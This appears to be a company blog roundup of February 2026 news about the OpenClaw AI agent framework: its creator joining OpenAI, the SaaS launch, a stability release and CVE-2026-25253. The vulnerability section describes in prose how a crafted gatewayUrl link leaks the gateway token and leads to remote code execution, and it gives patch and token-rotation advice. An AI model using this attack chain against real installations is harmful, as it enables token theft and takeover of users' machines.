- 1
- March
February 2026 was the month when OpenClaw — the open-source AI Agent Framework with over 145,000 GitHub stars — faced three major events in a single month. From the creator joining OpenAI, to a critical security vulnerability, and the launch of a new SaaS service. This article summarizes all three events with analysis of the impact for organizations currently using or considering AI Agents.
1. Peter Steinberger, OpenClaw Creator, Joins OpenAI
On February 14, 2026, Peter Steinberger, the creator of OpenClaw (formerly Clawdbot → Moltbot → OpenClaw), announced that he would be joining OpenAI. Sam Altman, CEO of OpenAI, tweeted about the news:
"Peter Steinberger is joining OpenAI to drive the next generation of personal agents. He is a genius with a lot of amazing ideas about the future of very smart agents interacting with each other to do very useful things for people."
- Sam Altman, CEO of OpenAI
Steinberger himself explained his reasons on his personal blog:
- "I want to change the world, not build a large company" — Although he could have turned OpenClaw into a high-value company, he chose not to.
- "Teaming up with OpenAI is the fastest way to bring this to everyone"
- His new goal is to "build an agent that even my mum can use"
What Happens to OpenClaw?
OpenClaw will move to an independent Foundation, with OpenAI sponsoring the transition. Steinberger confirmed:
- The project will remain Open-Source permanently
- It will support AI Models from multiple providers, not just OpenAI
- The developer community will play an increasingly important role in setting direction
What Organizations Should Watch:
When the primary creator no longer directly maintains the project, the pace of development and direction of OpenClaw may change. Organizations using OpenClaw should monitor how the new Foundation is structured and whether there is a clear Roadmap.
2. Critical Vulnerability CVE-2026-25253 — Zero-Click RCE
The most concerning news this month was the discovery of a High-severity security vulnerability in OpenClaw that allows attackers to take control of a developer's machine with virtually no user interaction required.
| Detail | Information |
|---|---|
| CVE | CVE-2026-25253 |
| CVSS Score | 8.8 (High) |
| Discovered By | Oasis Security |
| Affected Versions | All versions before 2026.1.29 |
| Patched Version | Version 2026.1.29+ (recommended 2026.2.25+) |
| Attack Type | Cross-Site WebSocket Hijacking → Remote Code Execution |
How Does the Attack Work?
The vulnerability exists in OpenClaw's WebSocket system, which runs locally on the user's machine. Here's how the attack works:
- The attacker crafts a malicious link containing a
gatewayUrlparameter pointing to their own server - The victim clicks the link — OpenClaw's Control UI automatically connects via WebSocket to the attacker's server, sending the Authentication Token along with it
- The attacker uses the captured token to connect back to the victim's local gateway
- Once access is gained, the attacker can modify config, disable sandbox, change tool policies, and execute arbitrary code
Steinberger himself explained:
"Control UI trusts gatewayUrl from the query string without validation and auto-connects on load, sending the stored gateway token... Clicking a crafted link can send the token to an attacker-controlled server."
- Peter Steinberger, OpenClaw Creator
Immediate Action Required:
- Update OpenClaw to version 2026.2.25 or later immediately
- Rotate all tokens and credentials previously used with OpenClaw
- Check logs for any suspicious WebSocket connections
- Avoid clicking links from untrusted sources while OpenClaw is running
This is not the first vulnerability for OpenClaw this year — The Register previously reported that the OpenClaw ecosystem has been experiencing ongoing security issues, which organizations must carefully consider before deploying in production (Read more: Data Security in ERP Systems)
3. OpenClaw SaaS Launch — No Installation Required
On February 28, 2026, Clawbot AI launched the SaaS version of OpenClaw on clawbot.ai, providing a new option for those who don't want to install OpenClaw on their own machines.
Key Features of OpenClaw SaaS
| Feature | Details |
|---|---|
| Cloud Deployment | No local installation needed — use directly through a web browser |
| AI Model Selection | System automatically selects the appropriate AI model based on task type |
| Managed Infrastructure | Clawbot AI handles servers, updates, and security entirely |
| Deploy in Minutes | Set up agents quickly through the web interface |
SaaS vs Self-Hosted — Which to Choose?
| Aspect | Self-Hosted | SaaS (Clawbot.ai) |
|---|---|---|
| Data Control | Full control — data stays on your machine | Data on Clawbot's cloud |
| Setup Difficulty | Requires technical knowledge | Easy — use via web browser |
| Security | Self-managed (must patch yourself) | Managed by Clawbot |
| Best For | Developers, organizations needing data privacy | Beginners, teams wanting to experiment |
Besides Clawbot AI, major cloud providers like DigitalOcean have also launched One-Click Deploy services for OpenClaw, demonstrating that AI Agents are truly becoming mainstream.
OpenClaw 2.26 — Major Stability Update
Beyond the 3 major news items above, OpenClaw also released version 2.26 focusing on stability and security improvements:
- Claude Opus 4.6 support — Default model via Kilo Gateway
- External Secrets Management — More secure credential handling
- HTTP Security Headers — Added Strict-Transport-Security for HTTPS
- Session Cleanup — Disk usage controls to prevent storage overflow
- Multilingual Memory Embeddings — Better multi-language support
Lessons for Organizations — Key Considerations Before Using AI Agents
All the events in February reflect that AI Agents are still in a growth phase with high uncertainty. Organizations considering these tools should ask themselves:
- How sensitive is the data you're giving AI Agents access to? — CVE-2026-25253 shows that agents running on local machines can be attacked. If data is sensitive (e.g., financial data, employee records), risk must be carefully assessed. (Read more: SQL Injection and Prevention)
- What is the Bus Factor of the project you're relying on? — OpenClaw was developed primarily by one person. When that person moves on, continuity becomes a question. Enterprise-grade software needs a clearly defined support team.
- Do you have a Patch Management process? — When new vulnerabilities emerge, how quickly can your organization update? (Read more: Disaster Recovery for Critical Systems)
AI Agent technology has high potential, but it must be used with understanding — not just "because it's trending" but with proper assessment of whether it's suitable for your organization, whether data is secure, and whether there's a contingency plan when problems arise.
- Saeree ERP Team
